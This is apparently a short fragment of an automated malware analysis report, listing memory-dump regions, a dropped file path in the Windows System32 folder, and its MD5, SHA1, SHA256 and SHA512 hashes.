SHA512 cc7a88709390ec82c94c587f2569c22c72a210298e14d77a0ad0ab633013d49af703d1fe77af904c272914885597442474a2c487d5a9bd2553de794a3ee1ce56

memory/2812-116-0x000000001BB30000-0x000000001BBB0000-memory.dmp

memory/2812-117-0x000000001BB30000-0x000000001BBB0000-memory.dmp

C:\Windows\System32\kill.ico

MD5 373d53d7c6709d5106b29a26a71b0d31
SHA1 1708009c111266ba513503e06b94a5ccd402dee5
SHA256 de3f42bc53000d3dad58f3182108c414ce8062095ef390314fcc628473490c86
SHA512 15b32cd9b87a9852d6ad0f03321edb15468e136a220ff4473bc109355c9b401a4c4f7eeb99ad7097c67f9cfac7c416f84038c0639e4db59561d2dbc74ef5d67d